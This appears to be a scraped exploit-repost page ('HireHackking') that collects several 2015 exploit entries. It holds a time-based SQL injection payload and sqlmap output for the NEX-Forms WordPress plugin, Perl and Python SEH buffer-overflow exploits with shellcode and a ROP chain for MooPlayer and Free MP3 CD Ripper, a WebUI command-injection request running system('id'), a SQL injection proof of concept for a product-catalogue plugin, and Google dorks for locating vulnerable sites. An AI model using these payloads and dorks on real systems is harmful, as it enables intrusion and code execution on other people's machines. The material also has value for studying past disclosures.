- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

WordPress Plugin NEX-Forms < 3.0 - SQL Injection

HACKER · %s · %s

###################### # Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Website Author: http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive) # Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/ # Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip # Dork Google: inurl:nex-forms-express-wp-form-builder # index of nex-forms-express-wp-form-builder # Date : 2015-03-29 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # Info: The "submit_nex_form" ajax function is affected from SQL Injection vulnerability "nex_forms_Id" var is not sanitized # PoC Exploit: http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE) # Poc Video: http://youtu.be/04G08Cbrx1I # PoC sqlmap: sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql [23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' [23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] [23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 85 HTTP(s) requests: --- Parameter: nex_forms_Id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE) --- [23:16:34] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 5.10 web application technology: PHP 5.3.3, Apache 2.2.3 back-end DBMS: MySQL 5.0.12 ###################### # Vulnerability Disclosure Timeline: 2015-03-29: Discovered vulnerability 2015-04-16: Vendor Notification 2015-04-17: Vendor Response/Feedback 2015-04-21: Vendor Send Fix/Patch (same version number) 2015-04-21: Public Disclosure ##################### Discovered By : Claudio Viviani http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive) http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################
HireHackking

MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)

HACKER · %s · %s

#!/usr/bin/perl ###########################################################################= ################################# # Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow # Date: 09-02-2015 # Exploit Author: Tomislav Paskalev # Vulnerable Software: MooPlayer v1.3.0 # Vendor Homepage: https://mooplayer.jaleco.com/ # Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b=86cb7-mooplayer-1.3.0.zip # Version: 1.3.0 # Tested on: Windows XP SP2 EN # OSVDB-ID: 118128 ###########################################################################= ################################# # Credits: # Vulnerability identified by Samandeep Singh # http://www.exploit-db.com/exploits/36022/ ###########################################################################= ################################# # Exploit notes: # mooplayer.exe was not compiled with SafeSEH, but always contains \x00 (bad character) # available and could be used, which would make the exploit work across multiple OS # versions, but the shellcode space would be limited since \x00 would terminate the string # other available modules (Win XP SP2 EN) - enough space for larger shellcode # oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True) # OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True) ###########################################################################= ################################# # Bad characters: # "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09" # "\x0b\x0c" # "\x0e\x0f" # "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19" # "\x1a\x1b\x1c\x1d\x1e\x1f" ###########################################################################= ################################# # How to exploit: # MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit # file) -> Open # OR drag and drop created exploit file into MooPlayer ###########################################################################= ################################# # Thanks to: # Samandeep Singh (PoC) # Peter Van Eeckhoutte (exploit development tutorials) # Offensive Security (IT security courses, admin support) ###########################################################################= ################################# $file = "MooPlayer_messagebox.m3u"; my $junk = "A" x 264; my $nextSEH = "\xeb\x20\x90\x90"; # jump over the next 32 bytes my $SEH = pack('V',0x74c96950); # POP POP RET from oleacc.dll (Win XP SP2 EN) my $NOPs = "\x90" x 100; # msfpayload windows/messagebox # msfencode -e x86/alpha_upper my $shellcode = "\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" . "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" . "\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" . "\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" . "\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" . "\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" . "\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" . "\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" . "\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" . "\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" . "\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" . "\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" . "\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" . "\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" . "\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" . "\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" . "\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" . "\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" . "\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" . "\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" . "\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" . "\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" . "\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" . "\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" . "\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" . "\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" . "\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" . "\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" . "\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" . "\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" . "\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" . "\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" . "\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" . "\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" . "\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" . "\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" . "\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" . "\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" . "\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" . "\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" . "\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" . "\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" . "\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" . "\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" . "\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" . "\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" . "\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" . "\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" . "\x4f\x50\x55\x45\x58\x41\x41"; # keep the exploit length consistent my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode)); open(myfile,">$file") ; print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;
HireHackking

WebUI 1.5b6 - Remote Code Execution

HACKER · %s · %s

#[+] Author: TUNISIAN CYBER #[+] Title: WebUI Remote Code Execution Vulnerability #[+] Date: 21-04-2015 #[+] Vendor: https://github.com/baram01/webui/ #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] Twitter: @TCYB3R #[+] Proof of concept: http://i.imgur.com/co9Qx0n.png ------------------------------------------------------------------------------- p0c: http://site/webui/mainfile.php?username=USER&password=PASSWORD&_login=1&Logon=';echo system('command');' Live HTTP Header: http://192.168.186.129/webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 GET /webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 HTTP/1.1 Host: 192.168.186.129 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Wed, 22 Apr 2015 13:20:23 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.39-0+deb7u2 Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 51 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html
HireHackking

WordPress Plugin Ultimate Product Catalogue - SQL Injection (2)

HACKER · %s · %s

# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue wordpress plugin # Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/" # Date: 22/04/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ # Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip # Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache 2.4.0 (Ubuntu) # CVE : Requested to mitre but not assigned yet # Category: webapps 1. Summary: Ultimate Product Catalogue is A responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads, +3.000 active installations. Unauthenticated SQL injection in parameter "SingleProduct" when a web visitor explores a product published by the web administrator 2. Vulnerability timeline: - 22/04/2015: Identified in version 3.1.2 - 22/04/2015: Comunicated to developer company etoilewebdesign.com - 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3 3. Vulnerable code: File Functions/Shortcodes.php line 779 3. Proof of concept http://<wordpress site>/?SingleProduct=2'+and+'a'='a http://<wordpress site>/?SingleProduct=2'+and+'a'='b 4. Solution: Update to version 3.1.3
HireHackking

Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)

HACKER · %s · %s

#!/usr/bin/env perl # original p0c https://www.exploit-db.com/exploits/36465/ # credit to TUNISIAN CYBER # however he was attemping to vanilla buffer overflow # in fact it is SEH based exploit # using the address 0x7C9D30D7 is limit the targets #which I assume belongs to OS file didn't work on win7 #yes he did find a buffer overflow since the offset reaches ESP before SEH #in this app, SEH based exploits are more effective and the main vuln in this case should be SEH #This p0c > win 7s & 8s # ThreatActor at CoreRed.com ## my $file = "p0c.wav"; my $buff = "A" x 4116; # offset to SEH my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll my $nop = "\x90" x 28; #msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d' my $shell = "\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" . "\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" . "\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" . "\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" . "\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" . "\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" . "\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" . "\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" . "\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" . "\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" . "\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" . "\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" . "\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" . "\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" . "\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" . "\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5"; open($FILE,">$file"); print $FILE $buff.$nseh.$seh.$nop.$shell; close($FILE); print "+++++++++++++++++++\n";
HireHackking
#!/usr/bin/python # original p0c https://www.exploit-db.com/exploits/36465/ # credit to TUNISIAN CYBER # modified SEH Exploit https://www.exploit-db.com/exploits/36826/ # credit to ThreatActor at CoreRed.com # Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe # Tested on: Windows 7 Ultimate X64 # Added DEP Bypass to the exploit # naxxo (head@gmail.com) import struct def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x004103fe, # POP EAX # RETN [fcrip.exe] 0x004e91f4, # ptr to &VirtualAlloc() [IAT fcrip.exe] 0x00418ff8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe] 0x00446c97, # PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe] 0x41414141, # Filler (compensate) 0x6f4811f8, # POP EBP # RETN [vorbisfile.dll] 0x1000c5ce, # & push esp # ret [libFLAC.dll] 0x00415bfb, # POP EBX # RETN [fcrip.exe] 0x00000001, # 0x00000001-> ebx 0x00415828, # POP EDX # RETN [fcrip.exe] 0x00001000, # 0x00001000-> edx 0x10005f62, # POP ECX # RETN [libFLAC.dll] 0x00000040, # 0x00000040-> ecx 0x00409967, # POP EDI # RETN [fcrip.exe] 0x00412427, # RETN (ROP NOP) [fcrip.exe] 0x00494277, # POP EAX # RETN [fcrip.exe] 0x90909090, # nop 0x004c8dc0, # PUSHAD # RETN [fcrip.exe] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() # msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\xff\x0a\x0d' shellcode = "" shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33" shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c" shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10" shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a" shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a" shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23" shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66" shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6" shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95" shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f" shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab" shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8" shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06" shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94" shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f" shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa" shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d" junk = "A" * 3812 junk+= rop_chain + "\x90" * (308-len(rop_chain)-len(shellcode)) + shellcode seh = "\xd8\x2a\x9d\x63" # 0x639d2ad8 : {pivot 1132 / 0x46c} : # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [vorbis.dll] ** | {PAGE_EXECUTE_READ} buffer = junk + seh + "\x90" * 800 file = "poc.wav" f=open(file,"w") f.write(buffer); f.close();
HireHackking

R2/Extreme 1.65 - Stack Buffer Overflow / Directory Traversal

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52061/info R2/Extreme is prone to a stack-based buffer-overflow vulnerability and a directory-traversal vulnerability. Exploiting these issues may allow remote attackers to execute arbitrary code or retrieve arbitrary files within the context of the affected application. R2/Extreme 1.65 is vulnerable; other versions may also be affected. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36829.zip